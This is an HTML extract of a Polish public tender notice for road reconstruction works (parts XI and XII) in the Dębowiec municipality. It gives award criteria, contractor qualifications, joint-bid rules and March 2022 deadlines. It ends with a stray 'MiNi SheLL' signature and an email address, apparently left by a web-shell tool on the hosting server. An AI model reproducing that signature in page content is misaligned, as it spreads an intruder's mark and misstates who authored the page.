<h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 11</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część XI – Przebudowa drogi wewnętrznej dz. nr ewid. 2285 w Dębowcu<br/>Planowana przebudowa drogi dz. nr ewid. 2285 w Dębowcu obejmuje odcinek o długości 45,5m wraz z rozjazdami. Szerokość jezdni z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 2,5 m, a szerokość poboczy 20 cm.<br/>Przebudowę drogi należy rozpocząć od rozebrania warstwy utwardzenia jezdni do grubości 30cm. W kolejnym etapie Zamawiający przewiduje regulację studni kanalizacyjnych. Następnie podłoże jezdni drogowej na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy na szerokości 2,9 m. Na tak przygotowanym podłożu zostanie wykonana podbudowa z kruszyw łamanych, mieszanka z kruszyw łamanych 0-31,5 mm o łącznej grubości 15 cm po zagęszczeniu. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości – 2,9 m. Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno-asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Szerokość jezdni wynosić będzie 2,5m. Obustronne pobocza o szerokości 20 cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy <br/>w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5 mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 12</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część XII – Przebudowa drogi wewnętrznej dz. nr ewid. 241/2 oraz 234 <br/>w Foluszu<br/>Planowana przebudowa drogi dz. nr ewid. 241/2 oraz 234 w Foluszu, obejmuje odcinek <br/>o długości około 220 m. Szerokość jezdni z nawierzchnią bitumiczną po wykonaniu przebudowy wynosić będzie 3 m, a szerokość poboczy 25 cm.<br/>Przebudowę drogi należy rozpocząć od obustronnego mechanicznego ścięcia zawyżonych poboczy o średniej grubości do 10 cm, na szerokości 0,5 m, wraz z wywozem ścinki na odległość do 10 km, oraz rozebranie warstwy gruntowej na środku jezdni. Należy wykonać frezowanie nawierzchni na połączeniu z drogą o nawierzchni bitumicznej. W kolejnym etapie zaplanowano odmulenie rowu przydrożnego oraz wykonanie przepustu rurowego pod zjazdem na drogę gminną nr ewid. 234. W zakresie powyższych prac mieszczą się roboty ziemne, wykonanie podbudowy pod przepust rurowy, ułożenie przepustu rurowego o średnicy 40 cm wraz z wykonaniem obsypki z kruszyw łamanych. Istniejącą nawierzchnię żwirową i gruntowo - żwirową jezdni drogowej wraz z bezpośrednio zalegającym pod nią podłożem, na całym przebiegu przebudowywanej drogi należy mechanicznie wyrównać i wyprofilować pod projektowane konstrukcyjne warstwy podbudowy. Na tak przygotowanym podłożu zostanie wykonana podbudowa z kruszyw łamanych, mieszanka z kruszyw łamanych 0-31,5 mm <br/>o łącznej grubości 15cm po zagęszczeniu. Warstwy konstrukcyjne podłoża należy ułożyć na całej szerokości jezdni łącznie z poboczami (całkowita szerokość 3,5m). Na tak przygotowanym podłożu, odpowiednio zagęszczonym, przyjęto ułożenie dwuwarstwowej nawierzchni z masy mineralno - asfaltowej: wyrównawcza warstwa profilowa o grubości 2 cm + warstwa ścieralna o grubości 4 cm, z uwzględnieniem skropienia warstwy profilowej asfaltem, przed ułożeniem warstwy ścieralnej. Do ułożenia nowej nawierzchni jezdni drogowej należy zastosować masę mineralno-asfaltową, grysowo-żwirową KR 1-2. Szerokość jezdni wynosić będzie 3 m. Obustronne pobocza o szerokości 25cm należy wyprofilować i utwardzić mieszanką z kruszyw łamanych 0-31,5 mm o średniej grubości warstwy 6 cm po zagęszczeniu. Istniejące zjazdy <br/>w obrębie pasa drogowego z uwagi na podniesienie niwelety jezdni wyprofilowane zostaną mieszanką z kruszyw łamanych 0-31,5mm. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233220-7 - Roboty w zakresie nawierzchni dróg</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">170 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji i rękojmi na wykonany przedmiot zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, o których mowa w art. 112 ust. 2 Pzp, dotyczące zdolności technicznej lub zawodowej. Za minimalny poziom zdolności uznane zostanie wykazanie przez wykonawcę, że:<br/>a)	nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał (czyli zakończył i odebrał protokołem częściowym lub końcowym) w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył minimum jedną robotę budowlaną polegającą na wykonaniu nawierzchni asfaltowej w ramach przebudowy/remontu drogi, o wartości nie mniejszej niż:<br/>- w zakresie Części I: minimum 150 000,00 zł brutto,<br/>- w zakresie Części II: minimum 10 000,00 zł brutto,<br/>- w zakresie Części III: minimum 150 000,00 zł brutto,<br/>- w zakresie Części IV: minimum 15 000,00 zł brutto,<br/>- w zakresie Części V: minimum 40 000,00 zł brutto,<br/>- w zakresie Części VI: minimum 150 000,00 zł brutto,<br/>- w zakresie Części VII: minimum 80 000,00 zł brutto,<br/>- w zakresie Części VIII: minimum 250 000,00 zł brutto,<br/>- w zakresie Części IX: minimum 15 000,00 zł brutto,<br/>- w zakresie Części X: minimum 60 000,00 zł brutto,<br/>- w zakresie Części XI: minimum 10 000,00 zł brutto,<br/>- w zakresie Części XII: minimum 60 000,00 zł brutto.<br/>W przypadku składania ofert na więcej niż jedną część zamówienia – tym samym zadaniem można wykazać się dla każdej z części, na które złożona jest oferta, pod warunkiem że zadanie to spełnia warunek w zakresie części o najwyższej wartości.<br/><br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami, należy wykazać robotę budowlaną, w której wykonawca bezpośrednio uczestniczył.<br/>b)	dysponuje lub będzie dysponować:<br/>	minimum 1 osobą posiadającą uprawnienia budowlane do kierowania robotami <br/>w specjalności inżynieryjnej drogowej oraz posiadającą minimum 5-letnie doświadczenie zawodowe w powyższej specjalności, w kierowaniu robotami budowlanymi lub budową, od momentu uzyskania uprawnień budowlanych - osoba ta będzie pełniła funkcję kierownika robót w specjalności inżynieryjnej drogowej; <br/>W przypadku składania ofert na więcej niż jedną część zamówienia - tą samą osobą można wykazać się w zakresie każdej części.<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia powinni spełniać warunek zdolności technicznej lub zawodowej w zakresie posiadanego doświadczenia zawodowego oraz dysponowania osobami zdolnymi do wykonania zamówienia w następujący sposób: Wykonawcy mogą wspólnie spełnić warunek.<br/>Osoba zdolna do wykonania zamówienia, tj. posiadająca prawo do wykonywania samodzielnych funkcji technicznych w budownictwie musi posiadać wymagane uprawnienia do kierowania robotami budowlanymi określone w ustawie z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawnych oraz musi być zrzeszona we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa lub musi spełniać warunki, o których mowa w art. 12a Prawa budowlanego, czyli być osobą której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniać wymogi, o których mowa w art. 20a ustawy o samorządach zawodowych architektów oraz inżynierów budownictwa dotyczące świadczenia usług transgranicznych. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający dokona oceny potwierdzenia braku podstaw do wykluczenia wykonawcy z udziału w postępowaniu określonych w art. 108 ust. 1 pkt 1-6 Pzp na podstawie oświadczenia z art. 125 ust. 1 Pzp, o którym mowa w ust. 11 pkt 10 lit. a SWZ. Zamawiający odstępuje od wymagania podmiotowych środków dowodowych w zakresie niepodlegania wykluczeniu z postępowania.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający odstępuje od wymagania podmiotowych środków dowodowych <br/>w zakresie spełnienia warunków udziału w postępowaniu. Oceny spełnienia warunków udziału w postępowaniu określonych w ust. 15 pkt 6 niniejszej SWZ Zamawiający dokona na podstawie oświadczenia z art. 125 ust. 1 Pzp, o którym mowa w ust. 11 pkt 10 lit. a SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę).<br/>3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są złożyć wraz z ofertą stosowne pełnomocnictwo – zgodnie z rozdziałem ust. 11 pkt 10 lit. e SWZ – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej <br/>do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4)	Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie (przez każdego z wykonawców lub upoważnionego pełnomocnika).<br/>5)	W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wykonawców oświadczenie, o którym mowa w art. 125 ust. 1 Pzp (ust. 11 pkt 10 lit. a SWZ) składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają spełnianie warunków udziału w postępowaniu w zakresie, w którym wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu, oraz brak podstaw wykluczenia – każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy wykluczenia. Oznacza to, iż<br/>a)	oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>b)	oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się oświadczenie o spełnianiu warunków złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, o którym mowa w art. 117 ust. 4 Pzp (ust. 11 pkt 10 lit. g SWZ), z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 8. <br/>7)	Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2)	Zamawiający przewiduje możliwość zmian postanowień zawartej umowy (w zakresie określonym art. 455 Pzp), zgodnie z warunkami zawartymi w załączniku nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-04 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/debowiec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-04 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-04-02</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com